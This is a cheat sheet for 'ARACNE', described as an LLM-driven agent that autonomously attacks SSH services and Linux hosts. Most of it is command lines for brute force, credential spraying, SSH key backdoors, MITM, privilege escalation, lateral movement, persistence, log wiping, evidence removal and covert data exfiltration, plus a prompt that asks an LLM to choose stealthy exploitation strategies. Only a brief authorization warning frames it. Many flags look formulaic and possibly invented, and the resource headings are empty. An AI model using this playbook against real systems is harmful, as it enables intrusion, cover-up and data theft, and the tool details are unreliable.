ARACNE Cheat Sheet

Overview

ARACNE (Autonomous Reconnaissance and Attack Coordination for Network Exploitation) is an LLM-based agent designed specifically to target SSH services and to autonomously explore and exploit Linux shell environments. It combines large language model reasoning with traditional penetration testing techniques to carry out sophisticated attacks against SSH-enabled systems.

**Critical warning**: Advanced autonomous exploitation tool. Use only on systems you own or have explicit written authorization to test. Unauthorized use is illegal.

Installation

Prerequisites

# System requirements
python3 --version  # Python 3.9+
pip3 --version
git --version

# Required system packages
sudo apt update
sudo apt install -y python3-pip python3-venv git curl wget
sudo apt install -y openssh-client sshpass hydra nmap masscan

# Install additional security tools
sudo apt install -y john hashcat gobuster dirb nikto
sudo apt install -y metasploit-framework exploitdb

Installation Methods

# Method 1: Git clone and setup
git clone https://github.com/aracne-ai/aracne.git
cd aracne
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

# Install LLM dependencies
pip install openai anthropic langchain
pip install transformers torch
pip install paramiko fabric pexpect

# Method 2: Docker installation
docker pull aracne/aracne:latest
docker run -it --rm -v "$(pwd)/sessions:/app/sessions" aracne/aracne:latest

# Method 3: PyPI installation (if available)
pip install aracne-agent

Configuration Setup

# Create configuration directory
mkdir -p ~/.aracne/config
mkdir -p ~/.aracne/sessions
mkdir -p ~/.aracne/payloads
mkdir -p ~/.aracne/logs

# Initialize configuration
aracne init

# Configure LLM providers
aracne config set openai_api_key "your-openai-key"
aracne config set openai_model "gpt-4"
aracne config set anthropic_api_key "your-anthropic-key"

# Set operational parameters
aracne config set max_session_time 3600
aracne config set autonomous_mode true
aracne config set stealth_mode true
aracne config set evidence_collection true

Basic Commands

Basic Operations

# Display help and version
aracne --help
aracne --version
aracne modules list

# Quick SSH reconnaissance
aracne recon ssh --target 192.168.1.100
aracne recon ssh --network 192.168.1.0/24
aracne recon ssh --target-list targets.txt

# SSH service analysis
aracne analyze ssh --target 192.168.1.100 --deep
aracne analyze ssh --target 192.168.1.100 --version-detection
aracne analyze ssh --target 192.168.1.100 --configuration-analysis

# System status and health
aracne status
aracne health-check
aracne modules status

Target Management

# Add SSH targets
aracne target add --host 192.168.1.100 --port 22
aracne target add --host example.com --port 2222
aracne target add --network 192.168.1.0/24 --ssh-only

# Target information and management
aracne target list --active
aracne target info 192.168.1.100
aracne target remove 192.168.1.100

# Import targets from various sources
aracne target import --nmap ssh_scan.xml
aracne target import --masscan masscan_results.txt
aracne target import --file ssh_targets.txt

# Target prioritization
aracne target prioritize --by vulnerability
aracne target prioritize --by accessibility
aracne target prioritize --custom-scoring

Session Management

# Create and manage attack sessions
aracne session create --target 192.168.1.100 --name "target_compromise"
aracne session list --active
aracne session switch target_compromise

# Session configuration
aracne session config --max-duration 2h
aracne session config --stealth-level high
aracne session config --logging-level verbose

# Session control
aracne session start --target 192.168.1.100
aracne session pause target_compromise
aracne session resume target_compromise
aracne session terminate target_compromise

SSH Reconnaissance and Analysis

SSH Service Discovery

# Comprehensive SSH discovery
aracne discover ssh --network 192.168.1.0/24 --comprehensive
aracne discover ssh --target-list targets.txt --fast
aracne discover ssh --target 192.168.1.100 --deep-analysis

# SSH version and banner analysis
aracne analyze banner --target 192.168.1.100
aracne analyze version --target 192.168.1.100 --vulnerability-check
aracne analyze configuration --target 192.168.1.100 --security-assessment

# SSH algorithm and cipher analysis
aracne analyze algorithms --target 192.168.1.100
aracne analyze ciphers --target 192.168.1.100 --weak-crypto
aracne analyze kex --target 192.168.1.100 --security-analysis

SSH Vulnerability Assessment

# SSH-specific vulnerability scanning
aracne vuln scan-ssh --target 192.168.1.100 --comprehensive
aracne vuln scan-ssh --target 192.168.1.100 --known-exploits
aracne vuln scan-ssh --network 192.168.1.0/24 --quick

# Configuration vulnerability analysis
aracne vuln config --target 192.168.1.100 --misconfigurations
aracne vuln config --target 192.168.1.100 --weak-settings
aracne vuln config --target 192.168.1.100 --default-configs

# SSH implementation vulnerabilities
aracne vuln implementation --target 192.168.1.100 --version-specific
aracne vuln implementation --target 192.168.1.100 --buffer-overflows
aracne vuln implementation --target 192.168.1.100 --timing-attacks

User Enumeration

# SSH user enumeration techniques
aracne enum users --target 192.168.1.100 --timing-based
aracne enum users --target 192.168.1.100 --error-based
aracne enum users --target 192.168.1.100 --comprehensive

# Username wordlist generation
aracne generate usernames --target 192.168.1.100 --context-aware
aracne generate usernames --company "Example Corp" --employees
aracne generate usernames --domain example.com --email-based

# User validation and verification
aracne validate users --target 192.168.1.100 --user-list users.txt
aracne validate users --target 192.168.1.100 --probabilistic
aracne validate users --target 192.168.1.100 --stealth-mode

Autonomous SSH Exploitation

Credential-Based Attacks

# Intelligent brute force attacks
aracne attack brute-force --target 192.168.1.100 --smart
aracne attack brute-force --target 192.168.1.100 --user admin --adaptive
aracne attack brute-force --target 192.168.1.100 --credential-stuffing

# Dictionary attacks with AI optimization
aracne attack dictionary --target 192.168.1.100 --ai-optimized
aracne attack dictionary --target 192.168.1.100 --context-aware
aracne attack dictionary --target 192.168.1.100 --pattern-learning

# Credential spraying
aracne attack spray --network 192.168.1.0/24 --common-passwords
aracne attack spray --target-list targets.txt --seasonal-passwords
aracne attack spray --targets multiple --lockout-aware

Key-Based Attacks

# SSH key discovery and analysis
aracne keys discover --target 192.168.1.100 --web-crawling
aracne keys discover --target 192.168.1.100 --git-repositories
aracne keys discover --target 192.168.1.100 --configuration-files

# Private key attacks
aracne keys attack --target 192.168.1.100 --weak-keys
aracne keys attack --target 192.168.1.100 --default-keys
aracne keys attack --target 192.168.1.100 --cracking

# Key injection and manipulation
aracne keys inject --target 192.168.1.100 --authorized-keys
aracne keys manipulate --target 192.168.1.100 --key-replacement
aracne keys backdoor --target 192.168.1.100 --persistent-access

Protocol Exploitation

# SSH protocol exploitation
aracne exploit protocol --target 192.168.1.100 --version-specific
aracne exploit protocol --target 192.168.1.100 --implementation-bugs
aracne exploit protocol --target 192.168.1.100 --timing-attacks

# Man-in-the-middle attacks
aracne exploit mitm --target 192.168.1.100 --arp-poisoning
aracne exploit mitm --target 192.168.1.100 --dns-spoofing
aracne exploit mitm --target 192.168.1.100 --certificate-manipulation

# Downgrade attacks
aracne exploit downgrade --target 192.168.1.100 --weak-algorithms
aracne exploit downgrade --target 192.168.1.100 --legacy-protocols
aracne exploit downgrade --target 192.168.1.100 --cipher-downgrade

Linux Shell Exploitation

Initial Access and Shell Establishment

# Establish initial shell access
aracne shell establish --target 192.168.1.100 --method ssh
aracne shell establish --target 192.168.1.100 --credentials user:pass
aracne shell establish --target 192.168.1.100 --key-file private_key

# Shell upgrade and stabilization
aracne shell upgrade --session session-123 --interactive
aracne shell upgrade --session session-123 --pty
aracne shell upgrade --session session-123 --full-terminal

# Shell persistence mechanisms
aracne shell persist --session session-123 --cron-job
aracne shell persist --session session-123 --systemd-service
aracne shell persist --session session-123 --ssh-keys

System Reconnaissance

# Autonomous system enumeration
aracne recon system --session session-123 --comprehensive
aracne recon system --session session-123 --quick-wins
aracne recon system --session session-123 --stealth-mode

# User and privilege enumeration
aracne recon users --session session-123 --all-users
aracne recon users --session session-123 --privileged-users
aracne recon users --session session-123 --sudo-capabilities

# Network and service discovery
aracne recon network --session session-123 --internal-networks
aracne recon services --session session-123 --running-services
aracne recon processes --session session-123 --interesting-processes

Privilege Escalation

# Autonomous privilege escalation
aracne privesc auto --session session-123 --all-techniques
aracne privesc auto --session session-123 --kernel-exploits
aracne privesc auto --session session-123 --suid-binaries

# Specific escalation techniques
aracne privesc sudo --session session-123 --sudo-abuse
aracne privesc cron --session session-123 --cron-jobs
aracne privesc services --session session-123 --service-abuse

# Custom escalation strategies
aracne privesc custom --session session-123 --ai-guided
aracne privesc search --session session-123 --novel-techniques
aracne privesc exploit --session session-123 --zero-day

Lateral Movement

# Network lateral movement
aracne lateral network --session session-123 --ssh-keys
aracne lateral network --session session-123 --credential-reuse
aracne lateral network --session session-123 --trust-relationships

# Service-based lateral movement
aracne lateral services --session session-123 --shared-services
aracne lateral services --session session-123 --database-access
aracne lateral services --session session-123 --file-shares

# Advanced lateral movement
aracne lateral advanced --session session-123 --kerberos
aracne lateral advanced --session session-123 --container-escape
aracne lateral advanced --session session-123 --cloud-metadata

AI-Powered Decision Making

Autonomous Reasoning Engine

# AI reasoning configuration
reasoning_config = {
    "model": "gpt-4",
    "temperature": 0.2,
    "max_tokens": 4000,
    "reasoning_depth": 3,
    "confidence_threshold": 0.85,
    "exploration_factor": 0.3
}

# Custom reasoning prompts for SSH exploitation
ssh_analysis_prompt = """
Analyze the SSH service and system information:
Target: {target}
SSH Version: {ssh_version}
Available Users: {users}
System Information: {system_info}
Previous Attempts: {previous_attempts}

Determine the best exploitation strategy:
1. Most likely attack vectors
2. Probability of success for each
3. Stealth considerations
4. Risk assessment
5. Next steps recommendation
"""

Adaptive Attack Strategies

# AI-guided attack planning
aracne ai plan-attack --target 192.168.1.100 --objective shell-access
aracne ai plan-attack --session session-123 --objective privilege-escalation
aracne ai plan-attack --target 192.168.1.100 --stealth-priority

# Dynamic strategy adaptation
aracne ai adapt-strategy --session session-123 --defense-detected
aracne ai adapt-strategy --session session-123 --failure-analysis
aracne ai adapt-strategy --session session-123 --new-information

# Learning from interactions
aracne ai learn --session session-123 --command-responses
aracne ai learn --target 192.168.1.100 --defense-mechanisms
aracne ai learn --global --pattern-recognition

Intelligent Command Generation

# AI-generated commands for exploration
aracne ai generate-commands --session session-123 --exploration
aracne ai generate-commands --session session-123 --privilege-escalation
aracne ai generate-commands --session session-123 --persistence

# Context-aware command selection
aracne ai select-commands --session session-123 --current-context
aracne ai select-commands --session session-123 --objective-focused
aracne ai select-commands --session session-123 --stealth-optimized

# Command effectiveness analysis
aracne ai analyze-effectiveness --session session-123 --command-history
aracne ai analyze-effectiveness --session session-123 --success-patterns
aracne ai analyze-effectiveness --session session-123 --failure-analysis

Advanced Exploitation Techniques

Stealth and Evasion

# Stealth mode operations
aracne stealth enable --session session-123 --advanced-evasion
aracne stealth timing --session session-123 --random-delays
aracne stealth obfuscation --session session-123 --command-obfuscation

# Anti-forensics techniques
aracne antiforensics enable --session session-123 --log-cleaning
aracne antiforensics timestamps --session session-123 --timestamp-manipulation
aracne antiforensics artifacts --session session-123 --artifact-removal

# Detection evasion
aracne evasion ids --session session-123 --ids-evasion
aracne evasion monitoring --session session-123 --monitoring-detection
aracne evasion behavioral --session session-123 --behavioral-mimicry

Persistence Mechanisms

# Establish persistent access
aracne persist establish --session session-123 --multiple-methods
aracne persist establish --session session-123 --stealth-persistence
aracne persist establish --session session-123 --redundant-access

# Persistence validation and testing
aracne persist validate --session session-123 --all-methods
aracne persist test --session session-123 --reconnection-test
aracne persist monitor --session session-123 --persistence-health

# Persistence cleanup and removal
aracne persist cleanup --session session-123 --selective-removal
aracne persist remove --session session-123 --complete-cleanup
aracne persist verify-removal --session session-123 --forensic-check

Data Exfiltration and Collection

# Intelligent data discovery
aracne data discover --session session-123 --sensitive-files
aracne data discover --session session-123 --database-content
aracne data discover --session session-123 --configuration-files

# Data classification and prioritization
aracne data classify --session session-123 --ai-classification
aracne data prioritize --session session-123 --business-value
aracne data assess --session session-123 --sensitivity-analysis

# Secure data exfiltration
aracne data exfiltrate --session session-123 --encrypted-channel
aracne data exfiltrate --session session-123 --steganography
aracne data exfiltrate --session session-123 --covert-channels

Monitoring and Logging

Session Monitoring

# Real-time session monitoring
aracne monitor session --session session-123 --real-time
aracne monitor activity --session session-123 --command-tracking
aracne monitor progress --session session-123 --objective-tracking

# Performance and resource monitoring
aracne monitor performance --session session-123 --resource-usage
aracne monitor network --session session-123 --traffic-analysis
aracne monitor system --session session-123 --system-impact

# Alert and notification system
aracne monitor alerts --session session-123 --critical-events
aracne monitor notifications --session session-123 --progress-updates
aracne monitor warnings --session session-123 --risk-indicators

Comprehensive Logging

# Enable detailed logging
aracne logging enable --session session-123 --comprehensive
aracne logging enable --session session-123 --ai-decisions
aracne logging enable --session session-123 --command-responses

# Log analysis and insights
aracne logging analyze --session session-123 --pattern-analysis
aracne logging analyze --session session-123 --success-factors
aracne logging analyze --session session-123 --failure-analysis

# Log export and reporting
aracne logging export --session session-123 --format json
aracne logging export --session session-123 --timeline-format
aracne logging export --session session-123 --forensic-format

Ethical and Safety Considerations

Authorization and Legal Compliance

# Define authorized targets and scope
aracne scope define --target 192.168.1.100 --authorized
aracne scope define --network 192.168.1.0/24 --internal-testing
aracne scope validate --target 192.168.1.100 --legal-check

# Documentation and evidence
aracne legal document --session session-123 --authorization-proof
aracne legal evidence --session session-123 --chain-of-custody
aracne legal export --session session-123 --court-ready

# Compliance verification
aracne compliance check --session session-123 --ethical-guidelines
aracne compliance verify --session session-123 --legal-requirements
aracne compliance audit --session session-123 --comprehensive

Safety and Risk Management

# Risk assessment and management
aracne risk assess --session session-123 --comprehensive
aracne risk monitor --session session-123 --real-time
aracne risk mitigate --session session-123 --automatic

# Safety controls and limits
aracne safety enable --session session-123 --all-controls
aracne safety limits --session session-123 --time-limits
aracne safety boundaries --session session-123 --scope-enforcement

# Emergency procedures
aracne emergency stop --session session-123 --immediate
aracne emergency cleanup --session session-123 --evidence-removal
aracne emergency report --session session-123 --incident-documentation

Troubleshooting and Optimization

Performance Optimization

# Optimize AI model performance
aracne optimize ai --model-selection --performance-focused
aracne optimize ai --token-usage --cost-optimization
aracne optimize ai --response-time --latency-reduction

# Session performance optimization
aracne optimize session --session session-123 --speed-optimization
aracne optimize session --session session-123 --resource-optimization
aracne optimize session --session session-123 --stealth-optimization

# Network and connectivity optimization
aracne optimize network --session session-123 --connection-stability
aracne optimize network --session session-123 --bandwidth-optimization
aracne optimize network --session session-123 --latency-reduction

Debugging and Diagnostics

# Debug mode and verbose logging
aracne --debug session start --target 192.168.1.100
aracne --verbose ai plan-attack --target 192.168.1.100
aracne logs view --level debug --component ai-reasoning

# System diagnostics
aracne diagnose system --comprehensive
aracne diagnose ai-models --connectivity-test
aracne diagnose ssh-client --configuration-check

# Error analysis and resolution
aracne errors analyze --session session-123 --root-cause
aracne errors resolve --error-id 12345 --auto-fix
aracne errors prevent --session session-123 --predictive-analysis

Recovery and Backup

# Session recovery and restoration
aracne recover session --session-id session-123 --full-recovery
aracne recover state --session session-123 --checkpoint-restore
aracne recover connection --session session-123 --reconnect

# Backup and data protection
aracne backup create --session session-123 --incremental
aracne backup restore --backup-id backup-456 --selective
aracne backup verify --backup-id backup-456 --integrity-check

# Data integrity and validation
aracne verify integrity --session session-123 --all-data
aracne verify consistency --session session-123 --cross-validation
aracne verify authenticity --session session-123 --digital-signatures

Integration Examples

SIEM Integration

# integrations/siem_integration.py
import requests
from aracne.core.integration import BaseIntegration

class SIEMIntegration(BaseIntegration):
    """Forward session events to a SIEM HTTP endpoint for audit and detection."""

    def __init__(self, siem_url, api_key):
        self.siem_url = siem_url
        self.api_key = api_key

    def send_ssh_attempt(self, attempt_data):
        # One event per SSH authentication attempt made by the agent
        event = {
            "timestamp": attempt_data.timestamp,
            "source": "aracne",
            "event_type": "ssh_attempt",
            "target": attempt_data.target,
            "username": attempt_data.username,
            "success": attempt_data.success,
            "method": attempt_data.method
        }

        return self.send_event(event)

    def send_privilege_escalation(self, privesc_data):
        # One event per privilege escalation attempt, successful or not
        event = {
            "timestamp": privesc_data.timestamp,
            "source": "aracne",
            "event_type": "privilege_escalation",
            "target": privesc_data.target,
            "technique": privesc_data.technique,
            "success": privesc_data.success,
            "privileges_gained": privesc_data.privileges
        }

        return self.send_event(event)

    def send_event(self, event):
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json"
        }

        try:
            # Time out instead of blocking the session on an unreachable SIEM
            response = requests.post(
                f"{self.siem_url}/api/events",
                headers=headers,
                json=event,
                timeout=10
            )
        except requests.RequestException:
            # Report delivery failure to the caller rather than raising
            return False

        return response.status_code == 200

Threat Intelligence Integration

# integrations/threat_intel.py
import requests
from aracne.core.threat_intel import ThreatIntelProvider

class ThreatIntelIntegration(ThreatIntelProvider):
    """Query and update a threat intelligence API over HTTPS."""

    def __init__(self, api_key):
        self.api_key = api_key
        self.base_url = "https://api.threatintel.com"

    def get_ssh_vulnerabilities(self, ssh_version):
        # Look up known vulnerabilities for the given SSH version string
        headers = {"Authorization": f"Bearer {self.api_key}"}

        response = requests.get(
            f"{self.base_url}/vulnerabilities/ssh/{ssh_version}",
            headers=headers,
            timeout=10  # do not hang indefinitely on a slow API
        )

        if response.status_code == 200:
            return response.json()
        return []

    def get_exploit_techniques(self, target_os, target_version):
        # Look up techniques recorded for an OS and version
        headers = {"Authorization": f"Bearer {self.api_key}"}

        response = requests.get(
            f"{self.base_url}/techniques/{target_os}/{target_version}",
            headers=headers,
            timeout=10
        )

        if response.status_code == 200:
            return response.json()
        return []

    def report_new_technique(self, technique_data):
        # Submit a technique record; the API answers 201 Created on success
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json"
        }

        response = requests.post(
            f"{self.base_url}/techniques/report",
            headers=headers,
            json=technique_data,
            timeout=10
        )

        return response.status_code == 201

Best Practices

SSH Exploitation Best Practices

# Reconnaissance before exploitation
aracne recon comprehensive --target 192.168.1.100 --pre-exploitation
aracne analyze target --target 192.168.1.100 --vulnerability-assessment
aracne plan attack --target 192.168.1.100 --risk-assessment

# Gradual escalation approach
aracne attack gentle --target 192.168.1.100 --low-impact
aracne attack moderate --target 192.168.1.100 --measured-approach
aracne attack aggressive --target 192.168.1.100 --high-confidence

# Stealth and operational security
aracne stealth maximum --session session-123 --anti-detection
aracne opsec enable --session session-123 --comprehensive
aracne evasion advanced --session session-123 --adaptive

AI Model Optimization

# Model selection and tuning
aracne ai optimize --model-selection --task-specific
aracne ai tune --parameters --performance-focused
aracne ai calibrate --confidence-thresholds --accuracy-focused

# Prompt engineering and optimization
aracne ai optimize-prompts --task ssh-exploitation
aracne ai optimize-prompts --task privilege-escalation
aracne ai optimize-prompts --task lateral-movement

# Continuous learning and improvement
aracne ai learn --from-sessions --pattern-recognition
aracne ai update --knowledge-base --latest-techniques
aracne ai validate --accuracy --benchmark-testing

Operational Excellence

# Session management best practices
aracne session plan --target 192.168.1.100 --comprehensive-planning
aracne session execute --plan session-plan --monitored-execution
aracne session review --session session-123 --lessons-learned

# Documentation and reporting
aracne document session --session session-123 --comprehensive
aracne report generate --session session-123 --technical-details
aracne evidence collect --session session-123 --forensic-quality

# Quality assurance and validation
aracne validate findings --session session-123 --cross-verification
aracne verify exploits --session session-123 --proof-of-concept
aracne assess impact --session session-123 --business-context

Resources

Documentation

Research and Papers

Community

Training